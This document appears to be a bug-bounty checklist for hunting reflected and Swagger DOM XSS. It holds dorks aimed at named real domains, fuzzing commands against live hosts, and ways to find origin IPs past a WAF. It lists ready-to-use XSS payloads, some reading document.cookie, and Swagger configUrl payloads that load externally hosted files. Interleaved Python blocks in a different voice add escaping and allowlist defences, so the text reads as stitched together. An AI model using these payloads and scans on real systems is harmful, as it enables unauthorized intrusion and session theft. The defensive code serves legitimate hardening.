My Hunting Approach Step-2

partners.bigcommerce.com

1

Google Dorks for finding XSS

site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?
site:dell.com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= | inurl:page= | inurl:year= | inurl:view= | inurl:email= | inurl:type= | inurl:name= | inurl:p= | inurl:callback= | inurl:api_key= | inurl:api= | inurl:password= | inurl:email= | inurl:username= | inurl:id= | inurl:item= | inurl:page_id= | inurl:month= | inurl:list_type= | inurl:url= | inurl:terms= | inurl:categoryid= | inurl:key= | inurl:l= | inurl:error= | inurl:&
site:*.nust.edu.pk ext:php inurl:& | inurl:? | inurl:=
2

Find Disallowed Paths (robots.txt) for Endpoint and Parameter Bruteforcing

site:dell.com inurl:robots.txt
3

Find Hidden Endpoints

ffuf -w wordlist/httparchive-wordlist/httparchive_directories_Endpoints.txt.txt -u https://platform.infiniteathlete.ai/FUZZ -v -mc 200 -recursion -recursion-depth 3

dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt
dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt --recursion-status=200
4

Find Hidden Parameters

arjun -u https://target.com/endpoint -t 10 -T 10 --disable-redirects
x8 -u https://target.com/endpoint -w httparchive_parameters.txt --reflected-only 
5

Confirm Vulnerable Parameter for Reflected XSS

"><a href=https://bing.com>hacked
'"><a href=https://bing.com>hacked<a href=https://bing.com>hacked
'"><marquee>Hacked_by_asad</marquee>
"><iframe width=500 height=500 src="https://evil.com"></iframe>
"-(alert)(origin)-"
"><img src=x onerror=prompt(2)>
"><svg onload=confirm(1)>
<"onmouseover=(confirm)(origin);"
"><a href=javascript:confirm(document.cookie)>ClickMe
"><a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
"><input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>
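What "confirm the parameter" actually tests is whether the reflected value comes back with its markup characters intact. The Python below is an added illustration, not code from this page: a vulnerable template that reflects `q` raw sits next to the hardened form that HTML-escapes it for both attribute and text context, with a check that runs a constructed sample of the probe strings above through the hardened renderer. The `PROBES` list, the `q` parameter and the http/https-only href policy are assumptions made for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed sample drawn from the probe strings listed above (assumption: each one
# arrives as the value of a reflected query parameter such as ?q=).
PROBES = [
    '"><a href=https://bing.com>hacked',
    '"><svg onload=confirm(1)>',
    '"><img src=x onerror=prompt(2)>',
    '<"onmouseover=(confirm)(origin);"',
    '"><a href=javascript:confirm(document.cookie)>ClickMe',
]


def render_vulnerable(q: str) -> str:
    """Reflects the parameter unescaped into an attribute value and into element text."""
    return f'<input type="text" name="q" value="{q}"><p>Results for {q}</p>'


def render_hardened(q: str) -> str:
    """Same template, but the value is HTML-escaped for both contexts.

    html.escape(quote=True) rewrites & < > " ' as entities, so the probe can neither
    close the quoted attribute nor open a new tag.
    """
    safe = html.escape(q, quote=True)
    return f'<input type="text" name="q" value="{safe}"><p>Results for {safe}</p>'


def reflects_raw(body: str, probe: str) -> bool:
    """True when the probe appears in the response with its markup characters intact.

    This is the check behind confirming a reflected parameter: an escaped reflection
    never matches the raw probe.
    """
    return probe in body


def safe_href(url: str) -> str:
    """Escaping alone does not make a user-controlled href safe.

    A javascript: URL survives html.escape untouched, so the scheme is allowlisted first
    (assumption: only absolute http/https links are acceptable); anything else becomes '#'.
    """
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def all_probes_inert() -> bool:
    """Runs every probe through the hardened renderer; False if any still reflects raw."""
    return all(not reflects_raw(render_hardened(p), p) for p in PROBES)
```

Two of the probes in the list above target other contexts and need other fixes: `"-(alert)(origin)-"` only works where the value lands inside a JavaScript string, which HTML escaping does not address (the value must be JSON-encoded for that context), and the `href=javascript:` probe shows why a link destination built from user input needs a scheme allowlist as in `safe_href`, not just escaping.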
7

Find Origin IP to Bypass WAF

https://search.censys.io/
host="mytoken.us.dell.com"

https://en.fofa.info/
host="mytoken.us.dell.com"

https://www.shodan.io/search
hostname:"mytoken.us.dell.com"

curl -i url | head -n 15
nslookup mytoken.us.dell.com
8

Dork for finding Swagger DOM XSS

1
Google Dork
site:domain.com intext:"Swagger UI" | intitle:"Swagger UI"
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?url= 
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?configUrl= 
Shodan Dork
http.title:"Swagger UI" hostname:"domain.com"
2
?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json
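The weakness these dorks look for is a Swagger UI that honours `url` or `configUrl` from the query string and so fetches and renders an attacker-chosen document. Swagger UI's `queryConfigEnabled` option (false by default in current releases) controls whether those parameters may be overridden from the URL at all; where a deployment still has to accept a spec URL from the client, it should be checked against an allowlist before use. The Python below is an added example of that check, not code from Swagger UI or from this page; `ALLOWED_SPEC_HOSTS` and the rejected-URL values are constructed for the example, and the off-allowlist URLs in the test are the ones quoted above.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist (assumption): the only host a deployed Swagger UI should fetch
# OpenAPI documents from. Swap in the real API host when reusing this.
ALLOWED_SPEC_HOSTS = {"api.example.com"}

# The two query parameters the dorks above look for: Swagger UI reads a spec URL from
# `url` and a whole configuration object from `configUrl`.
SPEC_PARAMS = ("url", "configUrl")


def is_allowed_spec_url(candidate: str, allowed_hosts=ALLOWED_SPEC_HOSTS) -> bool:
    """Accepts only https URLs whose host is on the allowlist, with no userinfo or odd port."""
    parts = urlsplit(candidate.strip())
    if parts.scheme.lower() != "https":
        return False  # also rejects javascript:, data: and scheme-relative //host/ forms
    if parts.username is not None or parts.password is not None:
        return False  # 'https://api.example.com@evil.example/' must not pass on the userinfo
    try:
        port = parts.port
    except ValueError:
        return False  # malformed port
    if port not in (None, 443):
        return False
    return (parts.hostname or "").lower() in allowed_hosts


def untrusted_spec_params(query: str) -> list[tuple[str, str]]:
    """Returns every (parameter, value) in a query string that points off the allowlist."""
    qs = parse_qs(query.lstrip("?"), keep_blank_values=True)
    return [
        (name, value)
        for name in SPEC_PARAMS
        for value in qs.get(name, [])
        if not is_allowed_spec_url(value)
    ]
```

The userinfo and port checks matter because an allowlist comparison on the raw host string would accept `https://api.example.com@evil.example/` or `https://api.example.com.evil.example/`; comparing the parsed `hostname` against exact entries avoids both.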
